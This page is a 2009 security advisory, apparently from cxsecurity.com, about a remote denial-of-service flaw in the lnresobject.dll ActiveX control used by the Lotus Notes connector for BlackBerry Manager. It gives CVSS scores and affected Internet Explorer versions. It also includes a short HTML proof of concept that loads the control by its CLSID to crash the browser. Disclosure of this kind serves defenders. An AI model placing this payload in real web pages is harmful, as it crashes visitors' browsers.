Lotus note connector for Blackberry Manager ActiveX DoS Vuln

2009-09-02 / 2009-09-03
Risk: Medium
Local: No
Remote: Yes

CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

######################## Application: Lotus note connector for Blackberry Manager (And maybe other application that use it..) Platforms: Windows XP Professional French SP2 and SP3 crash: IE 8.0.6001.18702 IE 6.0.2900.2180 Exploitation: remote DoS Date: 2009-08-24 Author: Francis Provencher (Protek Research Lab's) ######################## 1) Introduction 2) Technical details and bug 3) The Code ######################## =============== 1) Introduction =============== Notes Connector is an easy to use tool that allows you to instantly synchronize all your Lotus Notes email. ######################## ============================ 2) Technical details ============================ Name: lnresobject.dll Ver.: CLSID: {158CD9E8-E195-4E82-9A78-0CF6B86B3629} ######################## =========== 3) The Code =========== Proof of concept DoS code; <html><body> <object classid="CLSID:{158CD9E8-E195-4E82-9A78-0CF6B86B3629}" ></object> </body></html> ########################



Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com


Back to Top